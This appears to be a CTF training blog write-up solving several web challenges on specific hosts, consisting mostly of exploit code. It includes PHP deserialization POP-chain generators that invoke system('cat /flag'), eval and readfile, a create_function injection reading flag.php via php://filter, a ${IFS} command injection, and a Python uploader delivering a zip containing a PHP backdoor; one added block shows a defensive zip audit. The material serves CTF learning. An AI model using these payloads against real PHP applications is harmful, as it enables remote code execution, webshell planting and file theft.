Week 1 Training: Web Writeup


http://47.101.176.40:11114/

```php
<?php
$command="system";
$argv='cat ./flag.php';
class QMRb7
{
    public $a;
    public $b;
}
class KOkjs
{
    public $a;
    public $b;
}
class MGkk8
{
    public $a="RPG";
    public $b;
}
class y97pu
{
    public $a;
    public $b;
    public $c;
}
$a=new y97pu();
$a2=new KOkjs();
$a2->a=new MGkk8();
$a2->a->b=new QMRb7();
$a2->a->b->a=$command;
$a2->a->b->b=$argv;
$c=array($a,$a2);
$c[0]->a=&$c[0]->b;
$c[0]->c=&$c[1];
echo serialize($c).PHP_EOL;
```

http://47.101.176.40:9004/

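The goal is to bypass the rmdir function. Here is_dir checks whether the path is a directory, and rmdir only deletes empty directories. The whitelist can therefore be used for the bypass: construct a directory named .pdf that contains a PHP backdoor.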

Then upload the archive:

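```python
import base64

import requests

url = 'http://47.101.176.40:9004/'

# Read the prepared archive and base64-encode it for the form field
with open("shell.zip", "rb") as f:
    payload = base64.b64encode(f.read())

data = {
    'base64': payload,
}
r = requests.post(url, data=data)
print(r.content)
```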

getshell:

1600EA7F3151DEC7469BD66DAE6105E1
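
A server-side check that closes this gap, as an added example (not code from the original writeup or the challenge): it audits a zip's entries before anything is extracted and accepts only flat regular files whose own extension is whitelisted, so a directory named .pdf never passes. The whitelist, the flat-archive policy and the names `audit_archive` and `build_sample_zip` are assumptions; the sample archive is constructed.

```python
import io
import posixpath
import zipfile

# Assumed whitelist; the challenge's real list is not shown on the page.
ALLOWED_EXTS = {".pdf"}


def build_sample_zip():
    """Constructed sample: one honest PDF plus a directory named '.pdf' holding a PHP file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 constructed sample")
        zf.writestr(".pdf/", b"")
        zf.writestr(".pdf/shell.php", b"<?php /* constructed placeholder */ ?>")
    return buf.getvalue()


def audit_archive(data, allowed=ALLOWED_EXTS):
    """Return (accepted, rejected); rejected maps entry name -> reason.

    The extension test is applied to regular files only, never to directory
    names, and nothing depends on rmdir() cleaning up afterwards.
    """
    accepted, rejected = [], {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = [p for p in name.split("/") if p]
            if name.startswith("/") or ".." in parts or "\\" in name:
                rejected[name] = "path escapes extraction root"
            elif info.is_dir():
                rejected[name] = "directories are not allowed"
            elif len(parts) != 1:
                rejected[name] = "nested path"
            elif posixpath.splitext(parts[0])[1].lower() not in allowed:
                rejected[name] = "extension not whitelisted"
            else:
                accepted.append(name)
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = audit_archive(build_sample_zip())
    print("accepted:", ok)
    for entry, reason in bad.items():
        print("rejected:", entry, "->", reason)
```

Extract only the accepted entries, into a fresh directory outside the web root and under server-generated names, and refuse the whole upload if anything was rejected.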

http://47.101.176.40:12223/

```php
<?php
namespace Control\State {
    class StopHook {
        protected $processes;
        public function __construct() {
            $this -> processes = array(new \Faker\MyGenerator());
        }
    }
    require 'closure/autoload.php';
    $payload = new StopHook();
    echo base64_encode(serialize($payload));
}

namespace Faker {
    class MyGenerator {
        protected $defaultValue;
        public function __construct() {
            $this -> defaultValue = new \Method\Func\GetFile();
        }
    }
}

namespace Method\Func{
    class GetFile {
        private $flag;
        public function __construct() {
            $this -> flag = new \Method\Func\GetDefault();
            $this -> value = 'test';
        }
    }
}

namespace Method\Func{
    class GetDefault {
        private $source;
        public function __construct()  {
            $this -> source = new \Method\Func\GenerateFile();
            $this -> source -> flag = 'myTest';
        }
    }
}

namespace Method\Func{
    class GenerateFile {
        public $flag;
        protected $buffer;

        public function __construct() {
            $function = function(){ eval(system('cat /flag')); };
            $this -> source -> generate = new \Opis\Closure\SerializableClosure($function);
        }
    }
}
```

http://47.101.176.40:11112/

```php
<?php
class A{
    public $c;
    public function __construct()
    {
        $this->c=new B();
    }
}
class B{
    public $b;
    public function __construct()
    {
        $this->b=new C();
    }
}
class C{
    public function getflag(){
        echo readfile("/flag");
    }
}
$a=new A();
echo urlencode(serialize($a));
```

http://47.101.176.40:13334/

```php
<?php

class a {
    public function __construct($a)
    {
        $this->test = $a;
    }
}

abstract class b {
    private $b = 1;

    public function __construct($a)
    {
        $this->b = $a;
    }
}

class c extends b {
    private $call;
    protected $value;

    public function __construct($a,$b)
    {
        $this->call = $a;
        $this->value = $b;
    }

    public function setB($c)
    {
        parent::__construct($c);
    }
}

class d {
    public $value;

    public function __construct($a) {
        $this->value = $a;
    }
}

$c = new C(
    [new d("system"),"eval"],
    [new d("cat /flag"),"eval"]
);

$c->setB([$c,"eval"]);
$exp = new a($c);

echo base64_encode(serialize($exp));
```

http://47.101.176.40:10011/

First, use mv to move the contents of fla.php into a readable file:

```
c=mv${IFS}fl?.php${IFS}qwqw
```

Then access qwqw.

http://47.101.176.40:8778/

```php
<?php
class A {
    public $var;
}
class B{
    public $func;
    public $arg;
}
$a=new A;
$a->var=new B;
$a->var->func="create_function";
$a->var->arg='return(1);}require(~('.strval(~('php://filter/read=convert.base64-encode/resource=flag.php')).'));//';
echo urlencode(serialize($a));
?>
```

http://47.101.176.40:3333/index.php

https://www.leavesongs.com/PENETRATION/how-I-hack-bash-through-environment-injection.html

tnt hinted that this one is easyphp from the 2022 HFCTF (虎符).


Author: kento
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit kento as the source when reposting!